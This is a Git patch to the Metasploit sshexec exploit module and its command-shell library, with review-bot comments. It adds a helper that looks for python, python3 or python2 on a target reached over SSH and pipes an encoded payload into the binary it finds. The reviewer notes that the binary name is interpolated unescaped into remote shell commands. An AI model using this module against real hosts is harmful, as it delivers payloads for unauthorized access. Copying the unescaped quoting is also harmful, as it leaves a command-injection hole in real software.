From b85031ff6adb68df5a9ced5448d905b6776014d3 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Fri, 18 Jun 2021 13:33:20 -0400
Subject: [PATCH] Fallback to Python3 in sshexec when it's available
---
 lib/msf/base/sessions/command_shell.rb | 29 ++++++++++++++++++--------
 modules/exploits/multi/ssh/sshexec.rb | 15 ++++++++++++-
 2 files changed, 34 insertions(+), 10 deletions(-)
diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb
index d7da9c540bfd..9516d8d2e2bb 100644
--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -328,22 +328,33 @@ def cmd_shell(*args)
 print_error("Can not pop up an interactive shell")
 end
+ def self.binary_exists(binary, platform: nil, &block)
+ if block.call('command -v command').to_s.strip == 'command'
+ binary_path = block.call("command -v '#{binary}' && echo true").to_s.strip
+ else
+ binary_path = block.call("which '#{binary}' && echo true").to_s.strip
+ end
+ return nil unless binary_path.include?('true')
+
+ binary_path.split("\n")[0].strip # removes 'true' from stdout
+ end
+
 #
 # Returns path of a binary in PATH env.
 #
 def binary_exists(binary)
- print_status("Trying to find binary(#{binary}) on target machine")
- if shell_command_token('command -v command').to_s.strip == 'command'
- binary_path = shell_command_token("command -v '#{binary}' && echo true").to_s.strip
- else
- binary_path = shell_command_token("which '#{binary}' && echo true").to_s.strip
+ print_status("Trying to find binary '#{binary}' on the target machine")
+
+ binary_path = self.class.binary_exists(binary, platform: platform) do |command|
+ shell_command_token(command)
 end
- unless binary_path.include?("true")
+
+ if binary_path.nil?
 print_error("#{binary} not found")
- return nil
+ else
+ print_status("Found #{binary} at #{binary_path}")
 end
- binary_path = binary_path.split("\n")[0].strip #removes 'true' from stdout
- print_status("Found #{binary} at #{binary_path}")
+
 return binary_path
 end
diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 9275f75225b3..0f2f8ca56340 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
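Review bot: The new class method `self.binary_exists` interpolates `binary` between single quotes in both lookup commands, so a name that itself contains a single quote ends the quoting and the remainder is parsed by the remote shell. Now that this is a class-level helper callable from any module, the argument should be escaped rather than hand-quoted, e.g. `block.call("command -v #{Shellwords.escape(binary)} && echo true")` and the same in the `which` branch (with `require 'shellwords'` if the file does not already load it). The `platform:` keyword is accepted here and passed by the instance method, and by the sshexec wrapper in the second hunk, but is never read, so callers may assume a platform check that does not happen; either drop it or note it with `# platform is currently unused; the lookup assumes a POSIX shell`. The method also has no comment stating that the block must run a command and return its stdout, and it calls `block.call` without first checking that a block was given.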
@@ -199,13 +199,26 @@ def do_login(ip, user, pass, port)
 fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
 end
+ def binary_exists(binary, platform: nil)
+ Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &method(:execute_command))
+ end
+
+ def execute_python
+ python_binary = binary_exists('python', platform: 'unix')
+ python_binary ||= binary_exists('python3', platform: 'unix')
+ python_binary ||= binary_exists('python2', platform: 'unix')
+ fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?
+
+ execute_command("echo \"#{payload.encoded}\" | #{python_binary}")
+ end
+
 def exploit
 do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
 print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
 case target['Platform']
 when 'python'
- execute_command("python -c \"#{payload.encoded}\"")
+ execute_python
 when 'unix'
 execute_command(payload.encoded)
 else
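Review bot: The `binary_exists` wrapper passes `&method(:execute_command)` to a helper that treats the block's return value as the command's stdout, but `execute_command` is defined outside this hunk, so that contract is not visible here. If it returns nil or anything other than the output (for example after rescuing an error), every probe looks like "not found" and `execute_python` fails with 'Python was not found on the target system', which hides the real failure. I would add a comment on the wrapper such as `# execute_command must return the remote command's stdout for the lookup to work` and confirm that this holds. `execute_python` also places `python_binary`, the first line of whatever the lookup printed, into the command line unchecked; it is worth confirming the value is a path before use. The `exploit` method continues past the end of the hunk.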